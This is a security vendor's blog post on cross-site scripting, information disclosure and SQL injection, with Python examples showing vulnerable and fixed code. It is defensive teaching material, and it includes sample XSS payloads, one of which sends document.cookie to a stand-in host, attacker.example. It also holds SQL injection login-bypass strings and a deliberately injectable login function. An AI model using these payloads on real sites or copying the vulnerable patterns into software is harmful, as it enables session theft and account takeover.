Top 3 Web Application Vulnerabilities Every Organization Should Be Aware of

Aug 28, 2019


In the last five years the technology and architecture of the applications organizations rely on have changed significantly, and insecure software has left plenty of room for vulnerabilities. Two organizations well known in the security community for analyzing top risks and security weaknesses, OWASP (the Open Web Application Security Project) and HackerOne, each publish a top-10 ranking of web application weaknesses, and three of those weaknesses appear on both lists.

OWASP’s Top 10 report analyzes the ten most critical web application security risks and represents a broad consensus on what organizations should review to reduce risk in their web applications. HackerOne has released its first report analyzing its database of valid vulnerabilities, covering more than 120,000 security weaknesses that have earned hackers over $55 million in bounties on its platform.

Three common web vulnerabilities appear in both rankings: cross-site scripting, information disclosure, and code injection.

Web Application Vulnerabilities Explained

Before we dive into the three most common web vulnerabilities, let’s briefly discuss what a web application security risk is. Below is OWASP’s chart depicting the path an attacker takes from exploiting a vulnerability to gaining access to, and impacting, an organization’s environment:

[Figure: OWASP chart explaining web application security risks.]

Because a web application accepts input from anyone who can reach it, an attacker can modify request parameters and drive the application into behaviour its developers never intended. Security weaknesses can exist in many parts of your organization’s security infrastructure, and bad actors will find and exploit them to reach your business assets and disrupt your day-to-day operations. Secuvant’s Cyber7™ approach outlines the top seven areas of business risk that can affect your business operations and explains how we determine the overall risk to your organization.

Now let’s discuss the three common web vulnerabilities that both OWASP and HackerOne rank among the top security risks.

Web Application Vulnerability #1: Cross-site Scripting

Cross-site scripting, otherwise known as XSS, is the most common vulnerability found in web applications. It is most often used to impersonate the victim by stealing their session cookies, but the injected script can do anything the victim can do in the application. Attackers exploit this vulnerability by using an organization’s web application to deliver malicious browser-side script to a different end user, where it runs in the application’s origin with that user’s session. There are three main types of cross-site scripting:

  1. Reflected: the payload travels in the request, typically in a URL parameter, and the server echoes it straight back into the response. The attacker therefore needs social engineering to lure the end user into sending that request, usually through a malicious link shared on social networks, by email or in chat. This type of XSS is the easiest to exploit. 
  2. Stored: the payload is submitted once and stored in a file, database or back-end system, and the application later displays it to every end user who views that data. Content management systems, blogs and forums are most at risk, because many users view content submitted by others, such as blog comments or forum posts, so one malicious submission affects all of them. 
  3. DOM-based: Document Object Model-based XSS occurs when client-side JavaScript reads attacker-controlled data from a source such as document.URL, document.location or document.referrer and writes it into the page through a dangerous sink (innerHTML, document.write, eval) without proper sanitization. The payload may never reach the server, so server-side filtering cannot catch it; the fix has to be made in the client-side code. 

The challenge in stopping these attacks by filtering is that there are hundreds of payload variants using different tags, attributes and encodings: blocking the literal `<script>` tag misses event-handler attributes such as onerror, javascript: URLs and encoded forms. The reliable defence is not to filter input but to encode output for the context it lands in (HTML body, attribute, JavaScript or URL), to mark session cookies HttpOnly so script cannot read them, and to deploy a Content Security Policy as a second layer. It is imperative that developers and application managers review their templating and JavaScript code consistently with these contexts in mind, in order to minimize the risk imposed on their organization.
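The following Python example, added here and not part of the original article, shows the stored/reflected case concretely: a comment renderer that concatenates user input into HTML, the same renderer behind a blocklist filter that strips `<script>` tags, and a version that uses context-aware output encoding. The payloads and the attacker host (attacker.example) are constructed for the example. The `executes_in_browser` oracle is a test aid for this block only, not a production detection rule.

```python
import html
import re

# Constructed sample inputs; attacker.example is a hypothetical host.
COOKIE_STEALER = "<script>new Image().src='https://attacker.example/?c='+document.cookie</script>"
ATTR_BREAKOUT = '" onmouseover="alert(document.cookie)'          # lands inside a quoted attribute
NO_SCRIPT_TAG = '<img src=x onerror="alert(document.cookie)">'     # no <script> tag at all
NESTED_TAG = "<scr<script>ipt>alert(document.cookie)</script>"     # defeats a single-pass strip


def render_comment_vulnerable(author: str, body: str) -> str:
    """Stored/reflected XSS: user-controlled text is concatenated straight into the page."""
    return f'<div class="comment" data-author="{author}"><p>{body}</p></div>'


def strip_script_tags(text: str) -> str:
    """The kind of blocklist filter the text above warns about: it knows exactly one variant."""
    return text.replace("<script>", "").replace("</script>", "")


def render_comment_filtered(author: str, body: str) -> str:
    """Blocklist filtering before concatenation. Still vulnerable, as the checks below show."""
    return render_comment_vulnerable(strip_script_tags(author), strip_script_tags(body))


def render_comment_safe(author: str, body: str) -> str:
    """Context-aware output encoding. html.escape(quote=True) turns <, >, &, " and ' into
    entities, so the same untrusted text is inert both in element content and inside a
    double-quoted attribute: the browser shows it as text and never parses it as markup."""
    return (f'<div class="comment" data-author="{html.escape(author, quote=True)}">'
            f'<p>{html.escape(body, quote=True)}</p></div>')


# Markup a browser would execute. A test oracle for this example only.
_LIVE_MARKUP = re.compile(
    r"<\s*script\b"                    # a real script element
    r"|<\s*img\b[^>]*\bonerror\s*="    # an inline event handler on an injected tag
    r'|"\s+on\w+\s*="',                # attribute break-out: closing quote, then a new on* handler
    re.IGNORECASE,
)


def executes_in_browser(rendered: str) -> bool:
    """True if the rendered HTML still contains markup a browser would execute."""
    return _LIVE_MARKUP.search(rendered) is not None


if __name__ == "__main__":
    for label, renderer in (("vulnerable", render_comment_vulnerable),
                            ("filtered", render_comment_filtered),
                            ("safe", render_comment_safe)):
        for payload in (COOKIE_STEALER, ATTR_BREAKOUT, NO_SCRIPT_TAG, NESTED_TAG):
            out = renderer(payload, payload)
            print(f"{label:10} executes={executes_in_browser(out)!s:5} {out[:70]}")
```

`html.escape` is the right encoder for the HTML body and quoted-attribute contexts shown here; a value placed inside a JavaScript string or a URL needs that context's own encoder, and a template engine that auto-escapes gives you this by default. For the DOM-based variant the equivalent fix lives in the client: assign untrusted text with `textContent` rather than `innerHTML`.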

Web Application Vulnerability #2: Information Disclosure

The next common web application vulnerability is information disclosure. As the name states, this risk is the disclosure of information to an actor who is not explicitly authorized to access it. A web application that fails to protect sensitive information hands an attacker details they can use later in an attack, which makes the disclosure itself an exploitable weakness. Examples of information disclosure include:

  • Banner grabbing/active reconnaissance, where response headers or error pages reveal the server, framework and their versions
  • Source code disclosure, for example a backup or misconfigured file served as plain text
  • Filename and path disclosure, typically through verbose error messages and stack traces

Organizations can reduce this exposure by never keeping sensitive data such as passwords or credit card numbers in plain text (hashing passwords, encrypting card data, and serving every page over HTTPS so data is not exposed in transit), by stripping version banners and verbose error output from production responses, and by securing session and authentication tokens so they cannot be read or replayed by an unauthorized party.
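The following Python example, added here and not part of the original article, is a small checker for the three disclosure types listed above. It parses raw HTTP responses and reports version banners in headers, absolute file paths and error detail in the body, and application source served as text. The three responses are constructed for the example (the host, paths and credentials in them are invented), and the `harden_headers` helper shows the header-side fix.

```python
import re

# Constructed HTTP responses; nothing here was captured from a real system.
LEAKY_RESPONSE = (
    "HTTP/1.1 500 Internal Server Error\r\n"
    "Server: Apache/2.4.29 (Ubuntu)\r\n"
    "X-Powered-By: PHP/7.2.24\r\n"
    "Content-Type: text/html\r\n"
    "\r\n"
    "<b>Warning</b>: mysqli_connect(): Access denied for user 'app'@'localhost' "
    "in <b>/var/www/html/includes/db.php</b> on line <b>17</b>\n"
)
BACKUP_RESPONSE = (  # a stray config.php.bak served as plain text
    "HTTP/1.1 200 OK\r\n"
    "Content-Type: text/plain\r\n"
    "\r\n"
    "<?php\n$db_host = 'localhost';\n$db_pass = 'hunter2';\n"
)
HARDENED_RESPONSE = (
    "HTTP/1.1 500 Internal Server Error\r\n"
    "Content-Type: text/html\r\n"
    "\r\n"
    "<p>Something went wrong. Reference ID 7f3a9c.</p>\n"
)

BANNER_HEADERS = ("server", "x-powered-by", "x-aspnet-version", "x-generator")
VERSION_RE = re.compile(r"\d+\.\d+(?:\.\d+)?")
PATH_RE = re.compile(r"[A-Za-z]:\\[^\s<>\"']+|/(?:var|usr|home|etc|opt|srv)/[^\s<>\"']+")
ERROR_DETAIL_RE = re.compile(
    r"Traceback \(most recent call last\)|\bat [\w$.]+\(\w+\.java:\d+\)|Stack trace:"
    r"|on line (?:<b>)?\d+|Access denied for user",
    re.IGNORECASE,
)
SOURCE_RE = re.compile(r"<\?php|<%@|<%=")  # PHP / JSP / ASP markers only; extend per stack


def parse_response(raw: str):
    """Split a raw HTTP/1.1 response into (status line, lower-cased header dict, body)."""
    head, _, body = raw.partition("\r\n\r\n")
    lines = head.split("\r\n")
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return lines[0], headers, body


def find_disclosures(raw: str) -> list:
    """Return a list of human-readable findings; an empty list means nothing was flagged."""
    _, headers, body = parse_response(raw)
    findings = []
    for name in BANNER_HEADERS:                       # banner grabbing
        if name in headers and VERSION_RE.search(headers[name]):
            findings.append(f"banner: {name} reveals version '{headers[name]}'")
    for m in PATH_RE.finditer(body):                   # filename and path disclosure
        findings.append(f"path: {m.group(0)}")
    if ERROR_DETAIL_RE.search(body):                   # verbose errors / stack traces
        findings.append("error detail: stack trace or error location in body")
    if SOURCE_RE.search(body):                         # source code disclosure
        findings.append("source: application code visible in body")
    return findings


def harden_headers(headers: dict) -> dict:
    """Drop the headers that advertise software versions. In practice do this at the web
    server or proxy (Apache: ServerTokens Prod; PHP: expose_php = Off) rather than per response."""
    return {k: v for k, v in headers.items() if k not in BANNER_HEADERS}


if __name__ == "__main__":
    for label, raw in (("leaky", LEAKY_RESPONSE), ("backup", BACKUP_RESPONSE),
                       ("hardened", HARDENED_RESPONSE)):
        print(label, find_disclosures(raw) or "clean")
```

The body checks are deliberately narrow: a production scanner would add the error signatures of every framework in use, and would treat any unexpected 500 with a non-generic body as a finding. The hardened response shows the pattern to aim for: a generic message plus a reference ID that support staff can correlate with the full error in server-side logs.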


Web Application Vulnerability #3: Code Injection

The third web application vulnerability named in both reports is code injection. It is exploited when an attacker supplies input that the application passes to an interpreter (a SQL engine, an operating-system shell, an LDAP directory, a template engine) and that interpreter executes as code. The root cause is typically the lack of proper input/output validation combined with untrusted data being concatenated into the command text instead of being passed to the interpreter separately as data. OWASP reports the most common example is a SQL query consuming untrusted data.
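The following Python example, added here and not part of the original article, shows the SQL case OWASP names using Python's built-in sqlite3 module: a login query built by string concatenation beside the same query with bound parameters, and a sort helper that shows the one case parameters cannot cover. The user table, passwords and payloads are constructed for the example, and the SHA-256 digest stands in for the slow, salted password hash a real system would use.

```python
import hashlib
import sqlite3


def digest(password: str) -> str:
    """Stand-in for a real password hash (use bcrypt/scrypt/argon2 in production)."""
    return hashlib.sha256(password.encode()).hexdigest()


def make_db() -> sqlite3.Connection:
    """In-memory table with two constructed accounts."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password_hash TEXT, is_admin INTEGER)")
    conn.executemany("INSERT INTO users VALUES (?, ?, ?)", [
        ("admin", digest("correct horse"), 1),
        ("alice", digest("battery staple"), 0),
    ])
    return conn


def login_vulnerable(conn, username: str, password: str):
    """Untrusted data is spliced into the statement text, so the SQL parser reads the
    attacker's quote and comment characters as SQL. Returns (username, is_admin) or None."""
    query = (f"SELECT username, is_admin FROM users WHERE username = '{username}' "
             f"AND password_hash = '{digest(password)}'")
    return conn.execute(query).fetchone()


def login_safe(conn, username: str, password: str):
    """Parameterized query: the statement is compiled with placeholders first and the
    values are bound afterwards as data, so no input can change the statement's structure."""
    query = "SELECT username, is_admin FROM users WHERE username = ? AND password_hash = ?"
    return conn.execute(query, (username, digest(password))).fetchone()


# Identifiers (table and column names, ORDER BY targets) cannot be bound as parameters.
# The only safe option there is an allowlist of values the application itself defines.
SORTABLE_COLUMNS = {"username", "is_admin"}


def list_users_sorted(conn, column: str) -> list:
    if column not in SORTABLE_COLUMNS:
        raise ValueError(f"unsupported sort column: {column!r}")
    rows = conn.execute(f"SELECT username FROM users ORDER BY {column}").fetchall()
    return [row[0] for row in rows]


if __name__ == "__main__":
    conn = make_db()
    for user in ("admin'--", "' OR 1=1--"):      # constructed payloads; '--' starts a SQL comment
        print(f"{user!r:15} vulnerable={login_vulnerable(conn, user, 'wrong')}"
              f" safe={login_safe(conn, user, 'wrong')}")
```

With the username `admin'--` the vulnerable query becomes `... WHERE username = 'admin'--' AND password_hash = '...'`: everything after `--` is a comment, the password check disappears, and the attacker is logged in as admin. The parameterized version compares the literal string `admin'--` against the username column and finds nothing. Stored procedures, ORMs and query builders only help when they keep this separation; an ORM method that accepts a raw concatenated string is just as injectable.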

Protecting Your Web Applications with Secuvant

As application hacking continues to be prevalent against organizations of all sizes, whether for stealing data, distributing malware, or gaining access to an organization’s business assets, it’s important that developers, security testers, organizations, and application managers perform frequent security assessments of their web applications. This testing helps find and patch vulnerabilities and gaps, and keeps operating systems and servers up to date.

For more information on how Secuvant can help your organization identify vulnerabilities in your systems and perform 24/7 managed detection and response services to catch bad actors before they disrupt your business, reach out to our security professionals at contactus@secuvant.com or 855-732-8826. We know how important your data is and we can help you take the necessary steps to ensure your business and assets are safe and secure from outside threats.